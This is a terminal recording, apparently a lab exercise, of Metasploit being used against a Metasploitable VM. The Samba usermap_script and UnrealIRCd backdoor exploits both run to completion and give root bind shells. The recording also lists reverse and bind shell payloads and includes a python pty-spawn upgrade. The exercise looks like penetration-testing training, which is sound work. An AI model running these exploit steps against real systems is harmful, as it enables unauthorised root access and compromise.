[78.621098, "o", "86)\r\n   11  \u001b[45mexploit\u001b[0m/linux/\u001b[45msamba\u001b[0m/is_known_pipename                2017-03-24       \u001b[32mexcellent\u001b[0m  Yes    \u001b[45mSamba\u001b[0m is_known_pipename() Arbitrary Module Load\r\n   12  \u001b[45mexploit\u001b[0m/linux/\u001b[45msamba\u001b[0m/lsa_transnames_heap              2007-05-14       good       Yes    \u001b[45mSamba\u001b[0m lsa_io_trans_names Heap Overflow\r\n   13  \u001b[45mexploit\u001b[0m/osx/\u001b[45msamba\u001b[0m/lsa_transnames_heap                2007-05-14       average    No     \u001b[45mSamba\u001b[0m lsa_io_trans_names Heap Overflow\r\n   14  \u001b[45mexploit\u001b[0m/solaris/\u001b[45msamba\u001b[0m/lsa_transnames_heap            2007-05-14       average    No     \u001b[45mSamba\u001b[0m lsa_io_trans_names Heap Overflow\r\n   15  \u001b[45mexploit\u001b[0m/freebsd/\u001b[45msamba\u001b[0m/trans2open                     2003-04-07       \u001b[32mgreat\u001b[0m      No     \u001b[45mSamba\u001b[0m trans2open Overflow (*BSD x86)\r\n   16  \u001b[45mexploit\u001b[0m/linux/\u001b[45msamba\u001b[0m/trans2open                       2003-04-07       \u001b[32mgreat\u001b[0m      No     \u001b[45mSamba\u001b[0m trans2open Overflow (Linux x86)\r\n   17  \u001b[45mex"]
[78.621203, "o", "ploit\u001b[0m/osx/\u001b[45msamba\u001b[0m/trans2open                         2003-04-07       \u001b[32mgreat\u001b[0m      No     \u001b[45mSamba\u001b[0m trans2open Overflow (Mac OS X PPC)\r\n   18  \u001b[45mexploit\u001b[0m/solaris/\u001b[45msamba\u001b[0m/trans2open                     2003-04-07       \u001b[32mgreat\u001b[0m      No     \u001b[45mSamba\u001b[0m trans2open Overflow (Solaris SPARC)\r\n   19  \u001b[45mexploit\u001b[0m/windows/http/\u001b[45msamba\u001b[0mr6_search_results          2003-06-21       normal     Yes    \u001b[45mSamba\u001b[0mr 6 Search Results Buffer Overflow\r\n\r\n\r\nInteract with a module by name or index. For example \u001b[32minfo 19\u001b[0m, \u001b[32muse 19\u001b[0m or \u001b[32muse exploit/windows/http/sambar6_search_results\u001b[0m\r\n\r\n"]
[78.649997, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[83.057035, "o", "u"]
[83.057157, "o", "se"]
[83.057239, "o", " "]
[83.057327, "o", "e"]
[83.05748, "o", "x"]
[83.057551, "o", "p"]
[83.057672, "o", "l"]
[83.057757, "o", "o"]
[83.057844, "o", "i"]
[83.057939, "o", "t"]
[83.058137, "o", "/"]
[83.058263, "o", "m"]
[83.058412, "o", "u"]
[83.058535, "o", "l"]
[83.058641, "o", "t"]
[83.05874, "o", "i"]
[83.058865, "o", "/"]
[83.058971, "o", "s"]
[83.059102, "o", "a"]
[83.059356, "o", "m"]
[83.059516, "o", "b"]
[83.05963, "o", "a"]
[83.059778, "o", "/"]
[83.059921, "o", "u"]
[83.060067, "o", "s"]
[83.060203, "o", "e"]
[83.060379, "o", "r"]
[83.06055, "o", "m"]
[83.060702, "o", "a"]
[83.060877, "o", "p"]
[83.061057, "o", "_"]
[83.061279, "o", "s"]
[83.061465, "o", "c"]
[83.061647, "o", "r"]
[83.06184, "o", "i"]
[83.062033, "o", "p"]
[83.062243, "o", "t"]
[83.90066, "o", "\r\r\n"]
[83.906776, "o", "\u001b[0m"]
[84.367652, "o", "\u001b[1m\u001b[34m[*]\u001b[0m No payload configured, defaulting to cmd/unix/reverse_netcat\r\n"]
[84.398147, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[89.752277, "o", "s"]
[89.752429, "o", "e"]
[89.752482, "o", "t"]
[89.752564, "o", " "]
[89.752651, "o", "R"]
[89.75276, "o", "H"]
[89.752836, "o", "O"]
[89.752984, "o", "S"]
[89.753063, "o", "T"]
[89.753192, "o", "S"]
[89.753328, "o", " "]
[89.753453, "o", "1"]
[89.753569, "o", "0"]
[89.75368, "o", "."]
[89.753804, "o", "0"]
[89.75392, "o", "."]
[89.754089, "o", "2"]
[89.754216, "o", "."]
[89.754385, "o", "8"]
[90.191762, "o", "\r\r\n"]
[90.198252, "o", "\u001b[0m"]
[90.204898, "o", "RHOSTS => 10.0.2.8\r\n"]
[90.235198, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[93.394242, "o", "s"]
[93.472426, "o", "h"]
[93.590406, "o", "o"]
[93.65456, "o", "w"]
[93.795556, "o", " "]
[93.884548, "o", "p"]
[93.981444, "o", "a"]
[94.165568, "o", "y"]
[94.437618, "o", "l"]
[94.625972, "o", "o"]
[94.680091, "o", "a"]
[94.8416, "o", "d"]
[94.994122, "o", "s"]
[95.532517, "o", "\r\r\n"]
[95.538631, "o", "\u001b[0m"]
[95.696119, "o", "\r\nCompatible Payloads\r\n===================\r\n\r\n   #   Name                                        Disclosure Date  Rank    Check  Description\r\n   -   ----                                        ---------------  ----    -----  -----------\r\n   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)\r\n   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)\r\n   2   payload/cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)\r\n   3   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)\r\n   4   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)\r\n   5   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)\r\n   6   payload/cmd/unix/bind_netcat"]
[95.696202, "o", "_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)\r\n   7   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6\r\n   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)\r\n   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6\r\n   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)\r\n   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)\r\n   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6\r\n   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)\r\n   14  payload/cmd/unix/bind_zsh            "]
[95.696337, "o", "                        normal  No     Unix Command Shell, Bind TCP (via Zsh)\r\n   15  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution\r\n   16  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)\r\n   17  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)\r\n   18  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)\r\n   19  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)\r\n   20  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)\r\n   21  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)\r\n   22  payload/cmd/unix/reverse_ksh"]
[95.696365, "o", "                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)\r\n   23  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)\r\n   24  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)\r\n   25  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)\r\n   26  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)\r\n   27  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)\r\n   28  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)\r\n   29  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)\r\n   30  payload/cmd/unix/"]
[95.696431, "o", "reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)\r\n   31  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)\r\n   32  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)\r\n   33  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)\r\n   34  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)\r\n   35  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)\r\n   36  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)\r\n   37  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH\r\n   38  payload/cmd/unix/re"]
[95.696465, "o", "verse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)\r\n   39  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)\r\n   40  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)\r\n\r\n"]
[95.729795, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[119.24077, "o", "s"]
[119.451865, "o", "e"]
[119.64865, "o", "t"]
[119.798577, "o", " "]
[119.966474, "o", "p"]
[120.082274, "o", "a"]
[120.262743, "o", "y"]
[120.603215, "o", "l"]
[120.822161, "o", "o"]
[120.909105, "o", "a"]
[121.030082, "o", "d"]
[121.21014, "o", " "]
[121.684251, "o", "p"]
[121.684435, "o", "a"]
[121.684567, "o", "y"]
[121.684649, "o", "l"]
[121.684779, "o", "o"]
[121.684939, "o", "a"]
[121.685055, "o", "d"]
[121.68523, "o", "/"]
[121.685463, "o", "c"]
[121.685599, "o", "m"]
[121.685752, "o", "d"]
[121.68592, "o", "/"]
[121.686061, "o", "u"]
[121.686277, "o", "n"]
[121.686457, "o", "i"]
[121.686611, "o", "x"]
[121.686791, "o", "/"]
[121.686977, "o", "b"]
[121.687233, "o", "i"]
[121.687446, "o", "n"]
[121.68765, "o", "d"]
[121.687856, "o", "_"]
[121.688068, "o", "p"]
[121.688325, "o", "e"]
[121.688569, "o", "r"]
[121.688822, "o", "l"]
[122.070503, "o", "\r\r\n"]
[122.076742, "o", "\u001b[0m"]
[122.085282, "o", "payload => cmd/unix/bind_perl\r\n"]
[122.116084, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[124.409346, "o", "e"]
[124.617116, "o", "x"]
[124.736039, "o", "p"]
[124.824044, "o", "l"]
[125.016912, "o", "o"]
[125.222941, "o", "i"]
[125.358974, "o", "t"]
[125.615652, "o", "\r\r\n"]
[125.622401, "o", "\u001b[0m"]
[125.667835, "o", "\r\n"]
[125.668099, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started bind TCP handler against 10.0.2.8:4444\r\n"]
[132.685565, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Command shell session 1 opened (10.0.2.15:33933 -> 10.0.2.8:4444 ) at 2022-02-16 04:46:23 -0500\r\n"]
[132.693092, "o", "\r\n"]
[132.69331, "o", "\u001b[0m"]
[136.624042, "o", "python -c 'import pty; pty.spawn(\"/bin/bash\")'"]
[137.527545, "o", "\r\n"]
[137.56027, "o", "root@metasploitable:/# "]
[139.364892, "o", "w"]
[139.634, "o", "h"]
[139.708205, "o", "o"]
[139.873174, "o", "a"]
[139.96909, "o", "m"]
[140.063758, "o", "i"]
[140.38659, "o", "\r\n"]
[140.406209, "o", "whoami"]
[140.413961, "o", "\r\r\nroot\r\r\nroot@metasploitable:/# "]
[144.308212, "o", "ls -lah /home"]
[144.697967, "o", "\r\n"]
[144.719414, "o", "ls -lah"]
[144.729308, "o", " /home\r\r\n\u001b[00mtotal 24K\r\r\ndrwxr-xr-x  6 root     root     4.0K Apr 16  2010 \u001b[01;34m.\u001b[00m\r\r\ndrwxr-xr-x 21 root     root     4.0K Feb 15 04:15 \u001b[01;34m..\u001b[00m\r\r\ndrwxr-xr-x  2 root     nogroup  4.0K Mar 17  2010 \u001b[01;34mftp\u001b[00m\r\r\ndrwxr-xr-x  5 msfadmin msfadmin 4.0K May 20  2012 \u001b[01;34mmsfadmin\u001b[00m\r\r\ndrwxr-xr-x  2 service  service  4.0K Apr 16  2010 \u001b[01;34mservice\u001b[00m\r\r\ndrwxr-xr-x  3 user     user     4.0K Jun 14  2021 \u001b[01;34muser\u001b[00m\r\r\n\u001b[mroot@metasploitable:/# "]
[148.418122, "o", "updatedb"]
[148.791764, "o", "\r\n"]
[148.812888, "o", "upda"]
[148.821078, "o", "tedb\r\r\n"]
[149.198756, "o", "root@metasploitable:/# "]
[152.744389, "o", "locate fichero-sospechoso.txt"]
[153.08766, "o", "\r\n"]
[153.10763, "o", "l"]
[153.115603, "o", "ocate fichero-sospechoso.txt\r\r\n/home/user/fichero-sospechoso.txt\r\r\n"]
[153.12339, "o", "root@metasploitable:/# "]
[155.110688, "o", "^C"]
[155.116301, "o", "\r\nAbort session 1? [y/N]  "]
[156.278061, "o", "y"]
[156.66473, "o", "\r\n"]
[156.674073, "o", "\r\n"]
[156.674322, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.8 - Command shell session 1 closed.  Reason: User exit\r\n"]
[156.7123, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[157.350156, "o", "c"]
[157.435374, "o", "l"]
[157.54229, "o", "e"]
[157.741679, "o", "a"]
[157.924898, "o", "r"]
[158.335866, "o", "\r\r\n"]
[158.342322, "o", "\u001b[0m"]
[158.342811, "o", "\u001b[1m\u001b[34m[*]\u001b[0m exec: clear\r\n"]
[158.343154, "o", "\r\n"]
[158.348, "o", "\u001b[H\u001b[2J\u001b[3J"]
[158.383988, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[162.574325, "o", "s"]
[162.57444, "o", "e"]
[162.574599, "o", "a"]
[162.574742, "o", "r"]
[162.574881, "o", "c"]
[162.574973, "o", "h"]
[162.575135, "o", " "]
[162.575392, "o", "i"]
[162.575559, "o", "r"]
[162.575703, "o", "c"]
[162.575822, "o", "d"]
[162.90353, "o", "\r\r\n"]
[162.909904, "o", "\u001b[0m"]
[163.056428, "o", "\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                        Disclosure Date  Rank       Check  Description\r\n   -  ----                                        ---------------  ----       -----  -----------\r\n   0  exploit/unix/irc/unreal_\u001b[45mircd\u001b[0m_3281_backdoor  2010-06-12       \u001b[32mexcellent\u001b[0m  No     Unreal\u001b[45mIRCD\u001b[0m 3.2.8.1 Backdoor Command Execution\r\n\r\n\r\n"]
[163.056783, "o", "Interact with a module by name or index. For example \u001b[32minfo 0\u001b[0m, \u001b[32muse 0\u001b[0m or \u001b[32muse exploit/unix/irc/unreal_ircd_3281_backdoor\u001b[0m\r\n\r\n"]
[163.08778, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mmulti/samba/usermap_script\u001b[0m) \u001b[0m> "]
[167.573186, "o", "u"]
[167.65663, "o", "s"]
[167.839747, "o", "e"]
[167.96465, "o", " "]
[168.864723, "o", "e"]
[168.864776, "o", "x"]
[168.864906, "o", "p"]
[168.86501, "o", "l"]
[168.865093, "o", "o"]
[168.86523, "o", "i"]
[168.865378, "o", "t"]
[168.865482, "o", "/"]
[168.865627, "o", "u"]
[168.865728, "o", "n"]
[168.865832, "o", "i"]
[168.86598, "o", "x"]
[168.866128, "o", "/"]
[168.866253, "o", "i"]
[168.866468, "o", "r"]
[168.866593, "o", "c"]
[168.866823, "o", "/"]
[168.86697, "o", "u"]
[168.867172, "o", "n"]
[168.867358, "o", "r"]
[168.86753, "o", "e"]
[168.867691, "o", "a"]
[168.867852, "o", "l"]
[168.868006, "o", "_"]
[168.8682, "o", "i"]
[168.86839, "o", "r"]
[168.868603, "o", "c"]
[168.868811, "o", "d"]
[168.869023, "o", "_"]
[168.869224, "o", "3"]
[168.869435, "o", "2"]
[168.869633, "o", "8"]
[168.869856, "o", "1"]
[168.87009, "o", "_"]
[168.870332, "o", "b"]
[168.870559, "o", "a"]
[168.870916, "o", "c"]
[168.871223, "o", "k"]
[168.871523, "o", "d"]
[168.87179, "o", "o"]
[168.872073, "o", "o"]
[168.872366, "o", "r"]
[169.204244, "o", "\r"]
[169.204289, "o", "\r\n"]
[169.210991, "o", "\u001b[0m"]
[169.339168, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/irc/unreal_ircd_3281_backdoor\u001b[0m) \u001b[0m> "]
[173.01457, "o", "s"]
[173.014734, "o", "h"]
[173.014841, "o", "o"]
[173.014906, "o", "w"]
[173.015001, "o", " "]
[173.015213, "o", "o"]
[173.015342, "o", "p"]
[173.015419, "o", "t"]
[173.015514, "o", "i"]
[173.015632, "o", "o"]
[173.015747, "o", "n"]
[173.015885, "o", "s"]
[173.32136, "o", "\r\r\n"]
[173.32832, "o", "\u001b[0m"]
[173.334297, "o", "\r\nModule options (exploit/unix/irc/unreal_ircd_3281_backdoor):\r\n\r\n   Name    Current Setting  Required  Description\r\n   ----    ---------------  --------  -----------\r\n   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit\r\n   RPORT   6667             yes       The target port (TCP)\r\n\r\n"]
[173.334925, "o", "\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic Target\r\n\r\n\r\n"]
[173.366118, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/irc/unreal_ircd_3281_backdoor\u001b[0m) \u001b[0m> "]
[177.302991, "o", "s"]
[177.30321, "o", "e"]
[177.303395, "o", "t"]
[177.303632, "o", " "]
[177.303762, "o", "R"]
[177.303848, "o", "H"]
[177.303961, "o", "O"]
[177.304055, "o", "S"]
[177.304175, "o", "T"]
[177.304275, "o", "S"]
[177.304404, "o", " "]
[177.304532, "o", "1"]
[177.304654, "o", "0"]
[177.3048, "o", "."]
[177.304961, "o", "0"]
[177.305115, "o", "."]
[177.30529, "o", "2"]
[177.305457, "o", "."]
[177.305626, "o", "8"]
[177.695491, "o", "\r\r\n"]
[177.702222, "o", "\u001b[0m"]
[177.708891, "o", "RHOSTS => 10.0.2.8\r\n"]
[177.739822, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/irc/unreal_ircd_3281_backdoor\u001b[0m) \u001b[0m> "]
[181.683942, "o", "s"]
[181.684088, "o", "h"]
[181.684232, "o", "o"]
[181.684265, "o", "w"]
[181.684409, "o", " "]
[181.684526, "o", "p"]
[181.684624, "o", "a"]
[181.684749, "o", "y"]
[181.684886, "o", "l"]
[181.685019, "o", "o"]
[181.685153, "o", "a"]
[181.685293, "o", "d"]
[181.685442, "o", "s"]
[182.028429, "o", "\r\r\n"]
[182.034832, "o", "\u001b[0m"]
[182.150332, "o", "\r\nCompatible Payloads\r\n===================\r\n\r\n   #   Name                                        Disclosure Date  Rank    Check  Description\r\n   -   ----                                        ---------------  ----    -----  -----------\r\n   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)\r\n   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6\r\n   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)\r\n   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6\r\n   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution\r\n   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)\r\n   6   payload/cmd/unix/"]
[182.150388, "o", "reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)\r\n   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)\r\n   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)\r\n   9   payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)\r\n   10  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)\r\n   11  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)\r\n\r\n"]
[182.1829, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/irc/unreal_ircd_3281_backdoor\u001b[0m) \u001b[0m> "]
[187.05796, "o", "s"]
[187.058097, "o", "e"]
[187.058175, "o", "t"]
[187.05825, "o", " "]
[187.058321, "o", "p"]
[187.058454, "o", "a"]
[187.058594, "o", "y"]
[187.05869, "o", "l"]
[187.058729, "o", "o"]
[187.058886, "o", "a"]
[187.058996, "o", "d"]
[187.059193, "o", " "]
[187.059377, "o", "p"]
[187.059496, "o", "a"]
[187.059644, "o", "y"]
[187.059759, "o", "l"]
[187.059934, "o", "o"]
[187.060116, "o", "a"]
[187.06025, "o", "d"]
[187.060404, "o", "/"]
[187.060611, "o", "c"]
[187.060791, "o", "m"]
[187.060948, "o", "d"]
[187.061098, "o", "/"]
[187.06129, "o", "u"]
[187.061463, "o", "n"]
[187.061753, "o", "i"]
[187.062, "o", "x"]
[187.062174, "o", "/"]
[187.062352, "o", "b"]
[187.062572, "o", "i"]
[187.062785, "o", "n"]
[187.062986, "o", "d"]
[187.063213, "o", "_"]
[187.063472, "o", "p"]
[187.063689, "o", "e"]
[187.0639, "o", "r"]
[187.064128, "o", "l"]
[187.454797, "o", "\r\r\n"]
[187.461687, "o", "\u001b[0m"]
[187.470279, "o", "payload => cmd/unix/bind_perl\r\n"]
[187.502558, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/irc/unreal_ircd_3281_backdoor\u001b[0m) \u001b[0m> "]
[191.147748, "o", "e"]
[191.147875, "o", "x"]
[191.147999, "o", "p"]
[191.148358, "o", "l"]
[191.148685, "o", "o"]
[191.149175, "o", "i"]
[191.149638, "o", "t"]
[191.511117, "o", "\r\r\n"]
[191.518661, "o", "\u001b[0m"]
[191.54232, "o", "\r\n"]
[191.542495, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.8:6667 - Connected to 10.0.2.8:6667...\r\n"]
[191.560142, "o", "    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\r\n"]
[191.560431, "o", "    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead\r\r\n"]
[191.560729, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.8:6667 - Sending backdoor command...\r\n"]
[191.561643, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started bind TCP handler against 10.0.2.8:4444\r\n"]
[199.456181, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Command shell session 2 opened (10.0.2.15:46197 -> 10.0.2.8:4444 ) at 2022-02-16 04:47:30 -0500\r\n"]
[199.463383, "o", "\r\n"]
[199.463647, "o", "\u001b[0m"]
[202.090539, "o", "python -c 'import pty; pty.spawn(\"/bin/bash\")'"]
[202.781253, "o", "\r\n"]
[202.834014, "o", "root@metasploitable:/etc/unreal# "]
[204.813679, "o", "w"]
[205.092852, "o", "h"]
[205.165165, "o", "o"]
[205.353578, "o", "a"]
[205.452295, "o", "m"]
[205.563001, "o", "i"]
[205.835423, "o", "\r\n"]
[205.856303, "o", "w"]
[205.864074, "o", "hoami\r\r\nroot\r\r\nroot@metasploitable:/etc/unreal# "]
[209.902847, "o", "ls -lah /home"]
[210.246481, "o", "\r\n"]
[210.267983, "o", "l"]
[210.276211, "o", "s -lah /home\r\r\n\u001b[00mtotal 24K\r\r\ndrwxr-xr-x  6 root     root     4.0K Apr 16  2010 \u001b[01;34m.\u001b[00m\r\r\ndrwxr-xr-x 21 root     root     4.0K Feb 15 04:15 \u001b[01;34m..\u001b[00m\r\r\ndrwxr-xr-x  2 root     nogroup  4.0K Mar 17  2010 \u001b[01;34mftp\u001b[00m\r\r\ndrwxr-xr-x  5 msfadmin msfadmin 4.0K May 20  2012 \u001b[01;34mmsfadmin\u001b[00m\r\r\ndrwxr-xr-x  2 service  service  4.0K Apr 16  2010 \u001b[01;34mservice\u001b[00m\r\r\ndrwxr-xr-x  3 user     user     4.0K Jun 14  2021 \u001b[01;34muser\u001b[00m\r\r\n\u001b[mroot@metasploitable:/etc/unreal# "]
[214.117765, "o", "locate fichero-sospechoso.txt"]
[214.486813, "o", "\r\n"]
[214.507525, "o", "l"]
[214.515007, "o", "ocate fichero-sospechoso.t"]
[214.522803, "o", "xt\r\r\n/home/user/fichero-sospechoso.txt\r\r\n"]
[214.533351, "o", "root@metasploitable:/etc/unreal# "]
[216.438248, "o", "^C"]
[216.44398, "o", "\r\nAbort session 2? [y/N]  "]
[217.370373, "o", "y"]
[217.813283, "o", "\r\n"]
[217.822578, "o", "\r\n"]
[217.822842, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.8 - Command shell session 2 closed.  Reason: User exit\r\n"]
[217.85724, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/irc/unreal_ircd_3281_backdoor\u001b[0m) \u001b[0m> "]
[218.416057, "o", "e"]
[218.625239, "o", "x"]
[218.715158, "o", "i"]
[218.876903, "o", "t"]
[219.068643, "o", "\r\r\n"]
[219.074926, "o", "\u001b[0m"]
[219.34938, "o", "                                                                                                                                                                                            \r\r"]
[219.349527, "o", "\u001b]0;root@kali: /home/kali\u0007\r\n"]
[219.362439, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[219.362499, "o", "\u001b[?1h\u001b="]
[219.363101, "o", "\u001b[?2004h"]
[220.248343, "o", "\u001b[4mc\u001b[24m"]
[220.248527, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mlear\u001b[39m\b\b\b\b"]
[220.402791, "o", "\b\u001b[24m\u001b[1m\u001b[31mc\u001b[1m\u001b[31ml\u001b[0m\u001b[39m"]
[220.502046, "o", "\b\b\u001b[1m\u001b[31mc\u001b[1m\u001b[31ml\u001b[1m\u001b[31me\u001b[0m\u001b[39m"]
[220.700861, "o", "\b\u001b[1m\u001b[31me\u001b[1m\u001b[31ma\u001b[0m\u001b[39m"]
[220.881497, "o", "\b\b\b\b\u001b[0m\u001b[32mc\u001b[0m\u001b[32ml\u001b[0m\u001b[32me\u001b[0m\u001b[32ma\u001b[32mr\u001b[39m"]
[221.009491, "o", "\u001b[?1l\u001b>"]
[221.010542, "o", "\u001b[?2004l\r\r\n"]
[221.011257, "o", "\u001b[H\u001b[2J\u001b[3J"]
[221.011395, "o", "                                                                                                                                                                                            \r\r\u001b]0;root@kali: /home/kali\u0007\r\n"]
[221.023643, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[221.023827, "o", "\u001b[?1h\u001b="]
[221.024253, "o", "\u001b[?2004h"]
[222.48642, "o", "\u001b[?2004l\r\r\n"]
